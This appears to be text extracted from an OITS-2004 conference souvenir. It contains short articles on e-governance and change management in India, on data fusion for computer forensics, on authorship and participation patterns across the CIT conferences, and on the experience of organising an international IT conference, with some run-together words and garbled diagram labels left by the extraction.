Mandatory organisational andinstitutional changes affecting both peopleand methods at all interfaces of the DeliveryChain

The need for acceptance of ChangedProcesses to be properly understoodinternalised adopted and improved toenable full advantages of the technologybeing adopted

De-layering of the decision-making levelsleading to re-engineering and appropriatesizing of the decision-making machinery

Training and acclimatisation of personnelat all levels more so at the lower rung ofgovernment management organisations

Prime MinisterChief MinisterLocalRepresentative Political Will PowerLoss of vested interests and assumed

power as well as authority both amongst thelegislature and the executive

We tried to conceptualise this with adiagram In the democratic world citizens electa person who is later termed the peoplesrepresentative or an MLA or MP All previousresearch did not include the peoplesrepresentative because in a democratic set-up

OITS-2004

12

the peoples representatives rule the countrythrough the Legislative Assembly or Lok Sabha(Parliament) and through the making of peopleor business-friendly laws and citizen-relatedschemes For the first time we tried to link thesepeople because political motivation is imperativefor the e-governance drive in India or anywhereelse in the world All people are directlyconnected with their representative as well as

administration for day-to-day governmentservices or work In this diagram both thepolitical level and administrative level are linkedwith citizens

In the abovementioned concept keeping inmind the reality of a democratic country andPerformance Management and Change Managementwe tried to bring in a new definition for e-Government

Performance Measurement of Government workforce

Change Management

Prime MinisterChief MinisterLocal Representative

Political Will Power

Efficiency in Government

Citizens Confidence in Government for

Better

Better Citizens Services through ICT-e-Government

e-Governance

Administrator

People willChange The Representativeif they do not perform

Citizens Confidence inGovernment for Better

Governance

OITS-2004

13

that is Use of ICT by the Government to providebetter Citizens Centric Services and Applicationthrough performance measurement based onchange management in internal organisationaltransformation set-up that is called e-Government

In other words e-Governance should belinked with the empowerment of everystakeholder along with the economicdevelopment of the country

There are other major issues too Ananalysis of the determinants of successful e-Government programmes shows that the keyfactors are the countries political will thestrength of their human capital theirtelecommunications infrastructure and thepresence of administrative priorities

The United Nations Report develops andpresents a synthetic e-Government index thatreflects and incorporates the countries officialonline presence evaluates theirtelecommunications infrastructure and assessestheir human development capacity In essencethe index reflects the requisite conditions that

constitute an enabling environment for e-Government

Multidimensional approach should beapplied for this kind of initiative that leads toreforms issues e-Government is considered aglobal change programme towards a custom-oriented governmental organisation Atransition of this importance needs clear visionand leadership A recent study on benchmarkingon e-Government projects done by CGEampY hasshown that different kind of e-Governmentprojects in the EU have been translated intomodels with important enablers for the furtherdevelopment of e-Government

These enablers are clustered into thefollowing categories

middot Leadershipmiddot Organisationmiddot Culturemiddot TechnologyA successful e-Government strategy should

contain all elements of the model in a balancedway

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

Vision Commitment Policy

Security Connectivity Infrastructure

Process Management Skills

Customer orientation Communication Partnership

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

Vision Commitment Policy

Security Connectivity Infrastructure

Process Management Skills

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

Vision Commitment Policy

Security Connectivity Infrastructure

Process Management Skills

Customer orientation Communication Partnership

OITS-2004

14

Enablers for Further e-GovernmentDevelopment

What kind of citizens services are neededmust first be analysed by the government so thataccording to requirements the governmentprovides services at minimum cost with nohassle through proper use of ICT This is thefirst step of e-Governance Government shouldstart performance-based change management inthe internal system for better efficiency andreliability to provide much-needed e-Government services in a manner that isaccountable Goals should be defined first andpriorities should be taken in account

Basic citizens services are considered firstbefore any e-Governance initiative and these canbe centralised with the department and availableonline for citizens and business peopleCitizens BusinessesIncome Taxes Social Contribution

for EmployeesJob Search Corporate TaxSocial Security Benefits VATPersonal Documents Registration of a New

CompanyCar Registration Submission of Data to the

Statistical OfficeApplication for Building Custom DeclarationPermission Declaration to Police Environment-related

PermitsPublic Libraries Public ProcurementBirth and MarriageCertificates Enrolment in HigherEducationAnnouncement of Moving Health-related Services

Sources CAP GEMINI Ernst amp Youngs Onlineavailability of public services Oct 2001Oct 2002

The recent study report by PACIFICCOUNCIL ON INTERNATIONAL POLICYRoadmap for E-Government in the DevelopingWorld has shown that the spread of informationand communication technology brings hope that

the government can transform And indeedforward-looking officials everywhere are usingtechnology to improve their governments workefficiency To recapitulate defined broadly e-Government is the use of ICT to promote moreefficient and effective government facilitate moreaccessible government services allow greaterpublic access to information and makegovernment more accountable to citizens E-Government might involve delivering servicesvia the Internet telephone community centres(self-service or facilitated by others) wirelessdevices or other communications systems

But e-Government is not a shortcut toeconomic development budget savings or cleanefficient government

E-Government is not the Big Bang asingle event that immediately and forever altersthe universe of government

E-Government is a process call it e-volution and often a struggle that presentscosts and risks both financial and political

These risks can be significant If not wellconceived and implemented e-Governmentinitiatives can waste resources fail in theirpromise to deliver useful services and thusincrease public frustration with governmentParticularly in the developing world whereresources are scarce e-Government must targetareas with high chances for success and producewinners

Moreover e-Government in the developingworld must accommodate certain uniqueconditions needs and obstacles These mayinclude a continuing oral tradition lack ofinfrastructure corruption weak educationalsystems and unequal access to technology Toooften the lack of resources and technology iscompounded by a lack of access to expertise andinformation

OITS-2004

15

E-Government success requires changinghow government works how it deals withinformation how officials view their jobs andinteract with the public Achieving e-Government success also requires activepartnerships between government citizens andthe private sector The e-Government processneeds continuous input and feedback from thecustomers the public businesses andofficials who use e-Government services Theirvoices and ideas are essential for making e-Government work When implemented well e-Government is a participatory process

The study group also classified tenremarkable questions for e-Governmentinitiatives in the developing world and if wedefine the entire question in a proper way wewould understand basic problems in e-Government implementation and how we canachieve faster growth in areas of e-Governmentby selecting the right citizen centric services

1 Why are we pursuing e-Government2 Do we have a clear vision and priorities

for e-Government3 What kind of e-Government are we ready

for4 Is there enough political will to lead the

e-Government effort5 Are we selecting e-Government projects

in the best way6 How should we plan and manage e-

Government projects7 How will we overcome resistance from

within the government8 How will we measure and communicate

progress And how will we know if weare failing

9 What should our relationship be with theprivate sector

10 How can e-Government improve citizensparticipation in public affairs

These questions itself give a betterunderstanding and if we define it practicallyaccording to the e-Government project then wecan be champions in e-Government

Above all the government should make aperformance-based index for their humanresources so that in a changed environment thegovernment can measure the performance ofofficersemployees and give them rewardsincentives and promotions on betterperformance Simultaneously the governmentwill also give proper training for a new ITenvironment and new IT solutions for betterservices delivered with KnowledgeManagement Unless and until these criteria arenot used by Government Citizens cant get on-time government services either online or offline

Therefore the government should rethinkand link these management tools in e-governanceenvironment to change the old mindset ofemployees (officials) because technology cantdo everything alone People need transformationin the government as well as the thinking of theperformer who performs the role in the e-Governance initiative Indeed e-Governmentmeans transformation of the government processthrough a series of measurements by applyingnew kinds of methodology and sharing the bestpractices along with knowledge and ideas inthe ICT environment That is the only way torealise our dreams

Raj Kumar Prasad is the Editor of Indian firste-commerce and CEO The Indian Chapter of theCommonwealth Centre for e-Governance and regularspeaker on e-governance and e-commerce worldwide anda thinker for social reform through ICT He is also memberof many world organisations and editorial member of manyInternational journals author can be reached atrajkumarelectronicgovindianet

OITS-2004

16

1 INTRODUCTION

We live in the Information Age and weare consumed by information With the rapiddevelopment of this Digital Information andCommunication Technology (DICT) and theability to conduct business and communicatethrough these revolutionary mediums haspositively impacted upon the social andeconomic well being of the Nation invadingnearly every area of modern life The currentstate-of-the-art of different security systems isrelatively primitive with respect to the recentexplosion in computer communicationscyberspace and electronic commerceOrganizations fully realize that cyberspace is acomplex realm of vital information flows withboth enabling and inhibiting technical factors

APPLICATION OF DATA FUSION IN COMPUTERFORENSICS

Sateesh Pradhan1 amp Suneeta Satpathy2

1 Research Fellow Directorate of Forensic Sciences GEQD Hyd2 Dept of Computer Science and Application Utkal University Bhubaneswar

Since Internet-related legislation is not yetmature and the infrastructure of information andcommunication society is still underconstruction there is always a space for illegalopportunists to commit crime which iscommonly known as Computer Frauds andCyber Crime (CFCC) While information isempowerment the sheer magnitude of theinformation we collect as well as the sensitivityof much of it necessitates that we be cautious inits maintenance storage and protectionIdentifying tracking classifying and assessinghostile and inhibiting activities in this ever-growing complex dimension is an enormous andfascinating technical challenge This is a problemthat has put a major impact in whole worldwideweb in the developed and developing countries

ABSTRACTIn the current age of Digital Information and Communication Technology (DICT) the potential for crushing

availability of data largely without meaning has become a reality Business has become increasingly dependenton the Internet and computing to operate Everywhere the individuals and the organizations are drowning in dataand information and starved for knowledge and understanding This problem has put a major impact worldwidein all the developed and developing countries One of the keys to solve this problem is Data and InformationFusion Data Fusion systems are being proposed for a wide variety of applications around the world by whichmore efficient and cost effective systems can be developed The desire to obtain the maximum benefit fromexpensive sensors and information systems has prompted this interest But the Legal support criminal justicedelivery system and international cooperation have not kept pace with the technological advancements which have takenplace with the advent of information technology Also it has become apparent that there are issues of evidencegathering in a computing environment which by their nature is technical and different to other forms of evidencegathering This paper provides a functional overview of the art and science of multisensor Data Fusion technologyand how it can enhance the performance and reliability of Advanced Security Management Systems and ComputerForensics (CF) and hence extend a further hand to the Law Enforcement and Forensic Investigating Agencies

Keywords Digital Information Technology (DICT) Data Fusion Information Fusion Computer Forensics (CF)Potential Legal Digital Evidence (PLDE)

OITS-2004

17

One of the keys to solve this problem is Dataand Information Fusion The techniques of DataFusion are designed to provide information ofa higher quality than could be obtained by usinga set of sensors independently The no of factorsthat allow the integration of data to be beneficialare

1 Redundancy2 Complementarities3 Timeliness4 Cost of the information

So the Law-Enforcement Agencies has aclear role to protect the informationinfrastructure which is critical to nationalsecurity and protect the public from criminal ormalicious activity occurring through theseelectronic mediums By explaining the nature ofthe vulnerabilities faced by the organizationstoday and discussing the problems this paperoffers an introduction to some of the technicalissues surrounding this new and specializedfield of Data Fusion and its application inComputer Forensics to identify and describesources of evidence to help the Law Enforcementand Forensic Investigating Agencies

2 ELEMENTS AND OBJECTIVES OFCOMPUTER FORENSICS

Computer forensics is the study ofcomputers and networks as they relate to legalprocesses The objective of Computer Forensicsis to learn about computer systems and networksand the information they contain and to do itin such a way that the knowledge can be usedin legal proceedings It is defined as anapplication of computer investigations andanalysis techniques in the interests ofdetermining Potential Legal Digital Evidence

Computer specialists can draw on an arrayof methods for discovering deleted

encrypted or damaged file information(Robbins 1997)

There are four steps in ComputerForensics [3]

1 Identify the evidence2 Preserve the evidence3 Analyze the evidence4 Present the evidence

Objective

1 Recovery Evidence preservation Damage control System restoration

2 Causation (Problem source)3 Proof Evidence Analysis Prove it to prevent future incidents

The tools and processes used in thecollection preservation and analysis ofComputer Forensics evidences are different foreach situation and computer system or network

3 DATA FUSION

Data Fusion is the process of combininginformation from a variety of sensors to producea unified result It can also be defined as a processof combining complementary information frommultiple sensor data to generate a single datathat contains a more accurate description of thescene than any of the individual source dataThe purpose is to merge the data coming fromdifferent information sources and the motivationis to provide information about a scene notobtainable from a single source or to reduce theuncertainty associated with data coming fromsingle source The fusion process ideallygenerates a single composite data that representsall the useful information from a set of data of

OITS-2004

18

different sensors thus removing the problemsinherent in frame-by-frame evaluation andimproves the data interpretation and recognitionby taking advantage of the complementarycharacteristics of different sensors

31 Advantages of Data fusionThe advantages gained through the

synergistic use of multisensory information canbe decomposed into a combination of fourfundamental aspects the redundancycomplementarily timeliness and cost of theinformation which can then be defined as thedegree to which each of these four aspects ispresent in the information provided by thesensors It also provides the following potentials

1Information from multiple viewpoints2 Extended coverage3 Improved accuracy4 Robust and fault-tolerant operation

32 Application and Potential opportunities ofData Fusion in Computer Forensics

Application of Data Fusion in variousfields

Data-fusion technology has been appliedmost prominently to military applications suchas battlefield surveillance and tactical situationassessment Data fusion has also emerged incommercial applications such as roboticsmanufacturing medical diagnosis and remotesensing [11 13 14] In a typical militarycommand and control (C2) system data fusionsensors are used to observe electromagneticradiation acoustic and thermal energy nuclearparticles infrared radiation noise and othersignals [12] In cyberspace security systems thesensors are different because the environmentaldimension is different Instead of a missilelaunch and supersonic transport through theatmosphere cyberspace sensors observeinformation flowing in networks However justas C2 commanders are interested in the originvelocity threat and targets of a warhead thesecurity personnels are interested in the identityrate of attacks threats and targets of maliciousintruders and criminals

Sensor 1

Sensor n

Data

Acquisition

Data

Fusion

Feature Extraction and Interpretation

Identify required

data

PROCESS OF DATA FUSION

The fusion process opens a way to reacha better analysis and understanding of the datafrom the viewpoint of accuracy andor reliabilityby providing enhanced information frommultiple sources [1 7 16] When the sensorsprovide information about the same aspect of aspecific entity the redundancy can be used toincrease accuracy and reliability The inherentparallel nature of using the multiple sensorsmeans that these systems usually operate fasterthan a single sensor could One way of accessingthe performance of such type of fusion systemis to measure the enhancement or thedegradation in the information provided by thesystem

Data + Algorithms + Knowledge = Data Fusion

Fusion Techniques

There are various types of fusion techniques

1 Low level fusion2 Medium level fusion3 High level fusion

OITS-2004

19

In CFThe major goal of Computer Forensics is to

develop and apply the scientific methods infinding the solutions driven by practitionerrequirements and addressing the needsconsidering the current paradigms Profilingidentifying tracing and apprehending cybersuspects are the important issues of researchtoday The ultimate goal is to obtain sufficientevidence in order to trace the crime back to thecriminal Within a computer system theanonymity afforded the criminal encouragesdestructive behavior while making it extremelydifficult for Law Enforcers to prove the identityof the criminal Therefore the ability to obtainthe fingerprint of the users is imperative toacquire some hold on identifying the perpetrator

The studies of available Log files alwaysstand as fundamental in evidence collection Butat a higher level it is necessary to possess a morein depth ability to narrow the field or evenestablish a list of possible suspects So the needof the hour is to develop a concept frameworkto assist Law Enforcement and ForensicInvestigating Agencies to gather the digitalevidences against electronic crimes bydeveloping methodology tools technology andprinciples for analysis and examination leadingto PLDE for expert testimony in the Court of Law

Multisensor Data Fusion provides animportant functional framework for buildingAdvanced Security Management systems andcyberspace security awareness A significantchallenge remains for security systems designersto combine the data and information fromnumerous heterogeneous distributed systemsinto a coherent process that can be used toevaluate the security of the cyberspace

Multisensor data-fusion technology is animportant avenue on the road toward the

development of highly reliable security-decisionsystems that identify track and assesscyberspace situations with multiple complexthreats The output of Fusion-based securitysystems will be the estimates of the identity(location) of a threat source the maliciousactivity taxonomy of the threats the attack ratesand an assessment of the potential severity ofthe projected target(s) This information can beused for gathering the Legal Digital Evidence toprovide timely Justice and punish the criminalby efficiently and timely analyzing the cases4 CONCLUSION

There exist significant opportunities andnumerous technical challenges for thecommercial application of Data Fusion theoryinto the art and science of cyberspace securitysystems The data fusion process is in the veryearly stages of technical development Howeveras networks continue to grow and the expandingrealms of cyberspace evolve there will be anurgent need to drive various securitymanagement systems towards next-generationcapabilities Determining the origin of highlysophisticated damage in cyberspace willcontinue to grow in complexity as attackersbecome more cyberspace astute So the futureSecurity systems tracking coordinatedmultifaceted cyberspace attacks require clusteranalysis techniques adaptive neural networksand rule-based knowledge systems

Multisensor Data fusion is a multifacetedengineering approach requiring the integrationof numerous diverse disciplines such asstatistics artificial intelligence signalprocessing pattern recognition cognitive theorydetection theory and decision theory Integratedsensor and decision support tools are emergingrequirements for robust and reliable AdvancedSecurity management systems in complexinternetworks

OITS-2004

20

5 REFERENCES

[1] wwwdatafusionorg

[2] Approaches to improve automation forsecurity Cyber Information Assurance ampDecision Support (CIADS) InformationSystems Laboratory Applied ResearchLaboratories the University of Texas atAustin

[3] Handbook of Computer Crime InvestigationForensic Tools amp Technology by EoghanCasey (Editor) Academic Press 2002

[4] Internet Engineering Task Force NetworkWorking Group Guidelines for the SecureOperation of the Internet RFC1281Available on line ftpinfocertorgpubietfssphwg

[5] Policies to Enhance Computer and NetworkForensics Proceedings of the 2001 IEEEWorkshop on Information Assurance andSecurity United States Military AcademyWest Point NY 5-6 June 2001

[6] Hochberg et al NADIR An automated systemfor detecting network intrusion andmisuse Computers amp Security 1993Elsevier Science New York 235248

[7] D L Hall and J Llinas An introduction toMultisensor data fusion In Proceedingsof the IEEE vol 85 ndeg 1 pp 6-23 1997

[8] L A Klein Sensor and data fusion conceptsand applications Tutorial texts vol TT14 SPIE Optical Engineering Press USA131 p 1993

[9] Waltz E Information Warfare Principles andOperations 1998 Artech House BostonMA

[10] Hall D Mathematical Techniques inMultisensor Data Fusion 1992 ArtechHouse Boston MA

[11]L F Pau Sensor data fusion Journal ofIntelligent and Robotics Systems vol 1pp 103-116 1988

[12] DSTO (Defence Science and TechnologyOrganization) Data Fusion SpecialInterest Group Data fusion lexiconDepartment of Defence Australia 7 p21 September 1994

[13] Varshney P Distributed Detection and DataFusion 1995 Springer-Verlag NewYork NY

[14] Wald L A European proposal for terms ofreference in data fusion InternationalArchives of Photogrammetry and RemoteSensing Vol XXXII Part 7

[15]Cyber Forensics by Simson Garfinkel

[16] Waltz E and Llinas J Multisensor DataFusion 1990 Artech House Boston MA

OITS-2004

21

The Conferences on InformationTechnology or CITs as they are more popularlyknown have been organised by the OrissaInformation Technology Society every year since1998 It was the first ever internationalconference on IT to be held in Orissa and becamean instant hit The overwhelming success of thisedition conveyed the message that not only hadCIT arrived but it was here to stay Apart fromtheir successes academically these conferencesalso present some interesting patterns regardingthe multiplicity of the authors their regions aswell as the areas of research1 Multiplicity of authors

The papers presented in these conferenceshave had authors ranging between one andseven However it has been found that papershaving two and three authors have dominatedwhile papers having five or more authors havebeen few and far between (Fig1) The onlyexception came in the first edition when papershaving two authors comprised more than three-fifths of the total number of papers (Fig2) Thedetails of the multiplicity of authors have beenpresented in Table 1 which is drawn

Interesting Patterns in CITsA Misra

Silicon School of Information TechnologySilicon Hills Patia Bhubaneswar-751031

aurabindasiliconacin

2 Regions of participations In this section we will consider the

participating regions in terms of countries aswell as institutes With India being the hostcountry she has the maximum representationunderstandably But if we look at the trends inthe participation of other countries we can alsoobserve certain interesting patterns

Firstly the United States has the highestrepresentation from overseas having at least oneauthor in thirty-five papers over the six editionsIt is followed by Japan (11) and Australia(10) inthat order (Table 2) It may be noted with interestthat there were three papers from Brazil in the1999 edition but those are the only papers fromBrazil till date Besides there are about twelvecountries which have only one occurrence whileUSA and Japan have been represented in everyedition

However one discouraging factor has beenthe sharp decline in overseas participants overthe six editions (Fig 3) While in the first edition5405 of the papers had at least one overseasauthor the figure has been hovering around the25 mark in the last four editions In spite ofthis 2003 has recorded the highest number ofpapers having overseas particpation ietwenty-one

On the contrary papers from Orissa havebeen increasing steadily every year which hasbeen shown in Fig 4

As far as Institutes are concerned then theIITs have been the most prominent with theexceptions of IIT Delhi and IIT Roorkee whichhave respectively six and one one contributions

Number of authors per paperYear 1 2 3 4 5 6 71998 6 21 8 1 1 0 01999 8 12 13 8 1 2 02000 5 15 12 1 0 0 12001 3 20 24 5 1 0 02002 4 16 17 4 0 2 02003 9 34 33 4 3 0 0

Table 1

OITS-2004

22

Multiplicity patterns

Fig 11998

Fig 2

age of papers involving overseas au thors yearwise

Fig 3Year

Year

OITS-2004

23

till date Leading the pack are IIT Kharagpurwith thirty-five papers and IIT Guwahati withtwenty-seven Among the other IITs IIT Kanpurhas seventeen while IIT Bombay and IIT Madrashave nine apiece Among the other InstitutesJadavpur University has contributed seventeenpapers while University of Hyderabad hascontributed ten The list of the leading Institutesin terms of number of papers alongwith ayearwise breakdown is given in Table 3

Another interesting trend that can beobserved here is that while the USA leadsoverseas list none of the Institutes figure in thelist while one Institute from Japan figures in thelist It can be concluded that the papers from the

Country 1998 1999 2000 2001 2002 2003 TotalUSA 6 10 3 8 1 7 35

Netherlands 2 0 1 0 0 0 3Japan 2 3 1 3 1 1 11

Australia 3 0 1 1 2 3 10Kuwait 1 0 0 0 0 0 1China 1 0 0 0 0 1 2

Sweden 1 0 0 0 0 0 1UK 1 0 0 0 2 3 6

Portugal 1 0 0 0 0 0 1Italy 1 2 1 1 1 0 6

Canada 1 1 0 0 1 3 6Taiwan 0 1 0 0 0 0 1Brazil 0 3 0 0 0 0 3

Finland 0 1 0 0 0 0 1Mexico 0 1 0 0 0 0 1

Germany 0 1 1 0 0 0 2Malaysia 0 0 1 0 1 1 3

Macao 0 0 0 1 0 0 1Thailand 0 0 0 1 0 0 1Norway 0 0 0 1 1 0 2

Singapore 0 0 0 0 1 0 1Serbia amp

Montenegro 0 0 0 0 0 1 1Tanzania 0 0 0 0 0 1 1

Table 2USA have been scattered across the countrywhile those from Japan have been concentratedin some particular Institutes3 The Topics

As far the topics are concernedNetworking leads the table with a total ofthirtythree papers Among other topics ofprominence are Soft Computing with thirty-onepapers Web-based computing with eighteenand Parallel amp Distributed Computing withsixteen papers Even though there have beenpapers from almost all areas of ComputerScience none of those areas have featuredconsistently in these conferences

OITS-2004

24

Trends in papers having authors from Orissa

Fig 4

Bibliography1 Mahapatra RN ed CIT 98 Trends in

Information Technology Tata McGraw-HillNew Delhi

2 Mohanty H and Baral C ed CIT 99 Trendsin Information Technology Tata McGraw-Hill New Delhi

3 Ghosh RK and Misra D ed CIT 2000Proceedings of Third InternationaConference on Information Technology TataMcGraw-Hill New Delhi

Institute 1998 1999 2000 2001 2002 2003 TotalIIT Kharagpur India 5 0 3 8 5 15 36IIT Guwahati India 1 7 4 6 5 4 27

Jadavpur University India 5 3 0 5 2 2 17IIT Kanpur India 3 1 1 6 2 4 17

University of HyderabadIndia 0 1 0 5 1 3 10

IIT Bombay India 1 3 2 1 1 1 9IIT MadrasIndia 0 0 1 2 3 3 9Iwate PrefecturalUniversity Japan 2 1 1 2 1 1 8

Table 34 Pujari AK and Mohapatra P ed CIT 2001

Proceedings of Fourt InternationalConference on Information Technology TataMcGraw-Hill New Delhi

5 Iyer S and Naik S ed CIT 2002 Proceedingsof Fifth International Conference onInformation Technology Tata McGraw-HillNew Delhi

6 Chakraborty G and Sarkar S ed CIT 2003Proceedings of Sixth InternationalConference on Information Technology TataMcGraw-Hill New Delhi

Year

OITS-2004

25

Conference is an academic activity thatallows researchers from a particular field topresent their findings and take suggestions andcomments from peers Academicians who arenot even presenting papers also attend theconference in order to keep themselves abreastof developments in the particular field and alsoto network with other attendees for possibleresearch collaboration In academic world thereis always the pressure of publish or perishConferences are an outlet to help academiciansto publish

While western world has already masteredthe art of holding conferences developingcountries are slowly gearing up to hosting qualityconferences A quality conference in generalrequires both quality and quantity ofparticipation until and unless the conference isvery narrowly focused Holding a conferencerequires quite a bit of pre-preparation andplanning The conference team needs to managethe logistics of interacting with a large numberof authors reviewers invited speakers potentialsponsors and delegates besides maintaining dayto day communication among all the teammembers This article enumerates the strategiesadopted to enhance both the quantity andquality aspect of an international conference1 inthe area of information technology held inDecember 2003 This conference was successfulin terms of participation management and otheraspects as expressed by various attendees of theconference and also in comparison withprevious conferences held by the same group

Experiences amp Learning from Organising anInternational Conference in a Developing Country

Laxman MohantyPhD Scholar BITS-Pilani

T-10 IIM Campus Vastrapur Ahmedabad-380015

Extending the ReachThe first and foremost challenge for a

conference is to reach to potential authors andthen attract as many delegates as possibleThough the particular conference had been heldconsecutively for last 5 years and had created aname for itself still it remained more or lessconfined to members of the parent associationand their friends It was found that faculty ofmany engineering colleges in India were notaware of the conference but on being told aboutit they showed keen interest to participate in itThus to extend the reach of the conferencefollowing strategies were adopted An e-group was created with the e-mail IDs

found from the proceedings of previousconferences Later this group was extendedusing e-mail IDs received from manypostings received in other e-groups likeBytesforall and IDs received from anotherteam member This e-group was used tobroadcast the call for paper (CFP)announcement 2 to 3 times Request was alsomade to members to forward the call forpaper to all people they knew and whowould be interested in the conference

An address list of engineering colleges ofIndia derived from the approved list ofengineering colleges of All India Council ofTechnical Education (AICTE) was preparedThis list was enriched by the addresses ofIndian Institutes of Technology (IITs)National Institutes of Technology (NITs)Indian Institutes of Information Technology

1 The author was the Organising Chair of theConference

OITS-2004

26

(IIITs) all RampD centers of Council ofScientific amp Industrial Research (CSIR) andother special institutions like Center forDevelopment of Advanced Computing (C-DAC) National Center for SoftwareTechnology (NCST) etc This list was usedto send the CFP poster so that facultyconcerned there could participate in theconference

A specific website was registered and usedto disseminate all information regarding theconference This website was also registeredwith several search engines All theconference documents carried the addressof this website The website also carried allcontact details of the organizing team

The website also carried links to four otherrelated conferences happening about at thesame time in the country and similarly thoseconference websites also provided links tothe website of this conference This crosslinking helped all the conferences to beknown to a large number of potentialparticipants

An address list of magazine and journalsrelated to IT and higher education likeUniversity News and Data Quest wasprepared and a brief write up about theconference was sent to those periodicalsMost of these magazines carried theinformation about the conference Thismethod worked well as judged from severalenquiries received which referred to thenews article in University News

Attracting Large Number of DelegatesThe second task was to attract large

number of delegates A focused effort was madefor achieving this Two separate documents wereprepared Advance Program booklet thatcontained details of the technical session and aposter for special events A symposium on ITamp Education industry session on Sustaining

Indias leadership in IT and student tutorialswere organized as three special events to havelarger public participation in the conferenceBoth the Advance Program booklet and theSpecial Events poster were sent by post to theauthors whose papers were selected and thespeakers who were invited for various talksThere were two fold reasons for this strategy 1)Authors and speakers would know details ofthe program and 2) they would use those twodocuments to invite their colleagues to theconference It was assumed that those authorswould take greater interest in spreading theinformation about the conference as comparedto the communication sent as a generic mail tothe head of the institution

The poster which contained details aboutspecific public events was distributed amongthe teachers of schools and colleges industryprofessionals and policy makers in the citywhere the conference was being held It was doneto enhance local participation in those publicevents

The conference was able to attract 246papers from 11 countries and this was almostdouble of what earlier conferences could attractIn fact this large number of papers increasedthe task of the Program Chairs beyondexpectation and they had to recruit morereviewers This also doubled the task ofinforming authors about the status of theirpapers acceptancerejection and finallydirection for final submissionCoordination Among the Organizing Team

The conference team consisted ofprofessionals working in various institutionsspread over different countries like India Japanand USA In India the members were fromdifferent cities Owing to team members beinglocated physically in different places physicalmeeting and planning were eliminatedCyberspace was extensively used to plan and

OITS-2004

27

decide various issues regarding the conferenceThree specific e-groups were created for variousrequirements Egroup1 This e-group contained the e-mail

IDs of the chairs of the conference It wasused to appraise other members regardingwho is doing what Also suggestions weresought for various issues such as publishersto be approached for proceedings who wereto be invited for keynote and special talksand which places to be included in the sightseeing tour etc

Egroup2 This e-group was a super set ofegroup1 and contained e-mail IDs of chairsof the present conference and the pastconferences It was assumed that this groupby being involved in 6 editions of thisconference (including the current one) helda large knowledgebase that can be used tosort out various policy issues regarding theconference For example issues likeregistration fee what type of tutorials andwhat facilities to be extended to variousinvited speakers were discussed anddecided upon through this e-group

Egroup3 This e-group comprised of themembers of the parent association of theconference This e-group was used to keepthe group members informed about thedevelopments of the conference and alsogalvanize support for participation andpublicity

Several members of the parent associationobserved during the conference that though theywere not actively contributing to any discussionin the e-group yet they were happy to get allstatus reports about the conference and be partof the discussions among the members

Besides these groups a large number of one-to-one and one-to-many e-mail exchanges weremade to facilitate information sharing anddecision making

It may be noted that the organizing team ofthe conference acted more like a virtual team withmembers physically located at various placesin the world Interestingly many members didnot know other members personally Thus it wasdecided that in the website the name of eachconference chair will be linked to hisherpersonal web pages so that other members canlook at those pages and become familiar withthe persons they are workingReviewing the Papers

Receiving papers reviewing theminforming the authors about the acceptancerejection of their papers and finally receivingthe camera ready papers are some of the criticalfunctions that needed to be done with great careCyberspace was extensively used to carry outthese activities thus making execution of tasksfaster accurate and inexpensive Though therewas no facility for online submission authorscould e-mail their papers to either of the ProgramChairs Each paper was to be reviewed by atleast two reviewers Private HTML pages werecreated to facilitate this review process TheseHTML pages carried the following informationabout the papers submitted - numbers titleswhether reviewers found or not for a given paperand if found whether two reviewers were foundReviewers were given the access to those pagesand were asked to select the papers which wereyet to be allotted for review and the ones theywould like to review They could then downloadthe concerned papers for review E-mails wereused to receive reviews from the reviewers andcommunicate the same to authors withselection rejection status of their papers Finalpapers were also received through e-mails fromthe authorsDelegation

Though the committee of chairs wasresponsible for all basic activities yet it was notpossible for this committee to handle allresponsibilities especially those related to local

OITS-2004

28

arrangements Thus a committee of coordinatorsfor various activities was formed to handlevarious sub functions For example acoordinator was especially designated to lookafter accommodation and local conveyance ofguest speakers and delegates The conferencewas providing accommodation to around 20 oddguest speakers and they were to reach the venueat different dates and times and from differentcountries Receiving them putting them up inhotels and enabling them to reach the conferencevenue were all complex tasks and needed fulltime attention of one person

Besides accommodation and localconveyance there were coordinators forregistration arrangement at the conferencevenue poster session and special programs etcThe details of this coordination team were putup on the website and delegates were informedthrough e-mails to get in touch with the relevantcoordinator for their queries and requirementsThe coordinators were the faculty members ofthe host college and each coordinator wasassisted by a team of student volunteers fromthe same college

This arrangement not only ensured smoothfunctioning of the conference it increasedinvolvement of a large number of facultymembers The coordinators also appreciated therecognition they received For student volunteersit was a great learning opportunityExtending the Scope of the Conference

By nature a conference is an academicfunction and only involves researchers andacademicians from different institutions But thisconference was designed also to accommodatestudents industry representatives and teachersfrom schools and colleges Three special eventswere organized for this target group asymposium for educators an industry sessionfor students researchers and teachers andtutorials specially designed for students Allthese sessions were very successful and attracted

a large number of participants from the city Thusthe conference could benefit the community inthe local contextThe Financing Model

The conference also had a unique financingmodel Its registration fee was kept sufficientlylow to attract large number of participants Thusthe registration fees alone were not sufficient tomeet all the expenses Though the conference isorganized by an association in reality a localengineering college takes the lead every year inhosting it while other colleges provide financialsupport So a large part of the financialrequirement was met by the contribution fromthe local engineering colleges In return thesecolleges were given free registration for certainnumber of participants in the conference andthe tutorials

Tutorials were designed in such a way(content duration course materials and otherfacilities wise) that participants would not mindpaying to attend them Independentsponsorships were sought from local collegesfor special events and this was acknowledgedduring the event Besides association membersstaying abroad were able to garner a large chunkof financial support from some corporates Govtorganization like CSIR also extended somesupport The conference was able to generate asmall surplus besides meeting all its needs Thissurplus is given to the parent association to carryout computer awareness activitiesConclusion

The whole experience of being part of theorganizing team that carried out planningdesigning and organizing of the conferenceshowed that by bringing in innovation todifferent dimensions of the conference a teamcan not only enhance both the quality andquantity of participation among variousstakeholders it can turn the whole experienceinto an enriching and fun filled experience

OITS-2004

29

Guiding Seminars and Projects for UndergraduateEngineering Students

MN DasProfessor amp HOD

Computer Science amp Engineering and IT

IntroductionConduct seminar presentation and projects

